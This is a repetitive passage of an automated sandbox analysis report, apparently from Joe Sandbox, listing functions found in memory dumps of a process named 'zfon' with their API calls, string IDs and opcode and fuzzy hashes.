                                                                                                                                                                            • Instruction Fuzzy Hash: ED4119AAA05B4186EB058F31E65433E67A1BB18FA8F145631CE6D23395CF3CD445C740
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                                                                                            • Instruction ID: 427a413f8ae6bdced5b35925e59778be139e6d3f9966781e78f294ab135c7cf1
                                                                                                                                                                            • Opcode Fuzzy Hash: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6571D063B08A4685EF24EBB5D4443ECA3B2EB48BE4F958935CE1D17798DE38D449C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                                                                                            • Instruction ID: fd27c29a450ecefe52ffa21dda26eb90e2769609847893ce258fc6b5b95b555b
                                                                                                                                                                            • Opcode Fuzzy Hash: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8571BB63B48A4689FF24EBB5D4443ACA3B2AB54B98F948935CE1E13B98DE3CD4458310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freemallocmemcpymemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3118627126-0
                                                                                                                                                                            • Opcode ID: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                                                                                            • Instruction ID: 9062175cefbc0d68da3ea64880448d6502d3c4c61cfc91ede7445ff9c1ffdb7c
                                                                                                                                                                            • Opcode Fuzzy Hash: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                                                                                            • Instruction Fuzzy Hash: BA71D427B4965684FE24AB7298043BCA776FB08BA4F985636CE6D177C4DF38E449C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                                                                                            • Instruction ID: 768743f927bbbf9ce4c61cf7889b5eace4872a2a237ce58cf3124a788efbf1e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                                                                                            • Instruction Fuzzy Hash: B351C163B48A4689FF20EF75E4503ACA3B2AB44BE4F844936DE1D17B98EE3CD4458310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: 473cb218bd9dcfae363dac5d456b711c7f5da966875aa11239a6934cc367b413
                                                                                                                                                                            • Instruction ID: 5c81a6beb0ac4446986c53a37c6038dd0402a436da48924c3a05bbcacc71befc
                                                                                                                                                                            • Opcode Fuzzy Hash: 473cb218bd9dcfae363dac5d456b711c7f5da966875aa11239a6934cc367b413
                                                                                                                                                                            • Instruction Fuzzy Hash: 5651B026B04A5684FF20EBB5D8443EC67B2BF48BE4F944A35DE5D17B88DF2894898310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: a5d4da3a4cc675d36da3e907575d5a8726f3eac4e27f902efdbd2ea72aec7a8d
                                                                                                                                                                            • Instruction ID: 8da9df334cf9c08c40e734a4cea32dc8d934b29f60ba53618f6ed476ea58362c
                                                                                                                                                                            • Opcode Fuzzy Hash: a5d4da3a4cc675d36da3e907575d5a8726f3eac4e27f902efdbd2ea72aec7a8d
                                                                                                                                                                            • Instruction Fuzzy Hash: E151B222B0965684FF24EFB5D8503AD67B2BF44BA4F944536CE5D17B88DF3894518320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: a0b0a483a40065930cb5af480a41cea5525e6b7e5afa53a07aa8fb18f7aacd68
                                                                                                                                                                            • Instruction ID: 94d287fe063fde9ee3da60b4959603fa77882fb66d1168d57b22fad6c25f5ef3
                                                                                                                                                                            • Opcode Fuzzy Hash: a0b0a483a40065930cb5af480a41cea5525e6b7e5afa53a07aa8fb18f7aacd68
                                                                                                                                                                            • Instruction Fuzzy Hash: 3051B222F08A5685FF20EFB6D8543AC67B2BF44BA4F944636DE5D17B98DF3894418320
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$AdjustPointermemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 338301193-0
                                                                                                                                                                            • Opcode ID: f4bbd506810e8ff949f1732fb6d8e1104fd3c67bd08d81a126e8d7f4640ce5bc
                                                                                                                                                                            • Instruction ID: c9a5da0617e65dba8fd4c5103e8e2bded2249c669bcc450209b9f4c06f88c96e
                                                                                                                                                                            • Opcode Fuzzy Hash: f4bbd506810e8ff949f1732fb6d8e1104fd3c67bd08d81a126e8d7f4640ce5bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 4751B6F9A0AA4291EB69DF71D1D453E639CEF46B84F0A6435DA4F27A90DF2CD4418F00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: 6ec1ee5972c53574257693c79e1a76e05e1dd9cfbc43a925a4a071997873a1f2
                                                                                                                                                                            • Instruction ID: 68a3356d0fb63b14c2c7edb8fcea3304ece89f4e0afc25494f230b1fe9938f98
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ec1ee5972c53574257693c79e1a76e05e1dd9cfbc43a925a4a071997873a1f2
                                                                                                                                                                            • Instruction Fuzzy Hash: AA515033608A8285EF20EF75E4402EDA3B2FB84794F944132EA8D57AA9DF38D945C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: b158af5b53e103a09b4aab3a9a72efacb738642fba927685012b0b402389091f
                                                                                                                                                                            • Instruction ID: d043a38f86dd1b9ffcbbd74514b1df45dcc36e8c8233fbb0402eacb9c3664b51
                                                                                                                                                                            • Opcode Fuzzy Hash: b158af5b53e103a09b4aab3a9a72efacb738642fba927685012b0b402389091f
                                                                                                                                                                            • Instruction Fuzzy Hash: D1F0D822A1458B91EEB0FBB4D4916FC5222AF54714FC45D31D64D8509B5F14DD4BC3A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            • API String ID: 211107550-393685449
                                                                                                                                                                            • Opcode ID: 6f42a4adf4f654b9ccc7c674dc7e4c3ff1af33df0a1f36dd7bc44f2aa948d2c7
                                                                                                                                                                            • Instruction ID: 511ca477cc2dcd2c1fe655c9af61a9e8b190e0f54ec741f774d5a51641faf5ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f42a4adf4f654b9ccc7c674dc7e4c3ff1af33df0a1f36dd7bc44f2aa948d2c7
                                                                                                                                                                            • Instruction Fuzzy Hash: D0E1D3B79087828AE710DF35D4803AE77A0FF45758F266235DA8D67665EF38E086CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            • API String ID: 211107550-393685449
                                                                                                                                                                            • Opcode ID: 78c6e7fb34b0392c5f88638df05ce5e29abaa94eb5bf539d305eb9caf3e55ea3
                                                                                                                                                                            • Instruction ID: 659821adfd7325567f053ceed98ac1dc4223f81b103752867bc4b2956be166ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 78c6e7fb34b0392c5f88638df05ce5e29abaa94eb5bf539d305eb9caf3e55ea3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FE1F3F6908B828AE714DF75D4C03AE77A8FB46748F146235DA8E27656DF38E581CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$free$mallocmemcpymemmove
                                                                                                                                                                            • String ID: c
                                                                                                                                                                            • API String ID: 2367844967-112844655
                                                                                                                                                                            • Opcode ID: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                                                                                            • Instruction ID: f6405ec7e65916c8ab44e85cebc78e84e19ea8923bc9538d1332130a96c33a2b
                                                                                                                                                                            • Opcode Fuzzy Hash: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                                                                                            • Instruction Fuzzy Hash: FAD15E23B08A829AFF24EF75D4403AC67B1EB45B88F844035DE4D67A99DF38D515C364
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_allocmemset
                                                                                                                                                                            • String ID: www.battle.net
                                                                                                                                                                            • API String ID: 3617466678-3493060400
                                                                                                                                                                            • Opcode ID: c7e2bc2cc281e77f54a6eaeeaf87b570be9d95c1c557086e9584b24d8a358c3a
                                                                                                                                                                            • Instruction ID: bb8dce509dfb693f45200c904fbf7f3d81c300f1f32a45c9ca9db5d592027223
                                                                                                                                                                            • Opcode Fuzzy Hash: c7e2bc2cc281e77f54a6eaeeaf87b570be9d95c1c557086e9584b24d8a358c3a
                                                                                                                                                                            • Instruction Fuzzy Hash: 61917023B4964384FF74EB25D0403B9A7B1EB85B94F988531DA8D476A4CF3CE855C720
                                                                                                                                                                            APIs
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B55C89
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
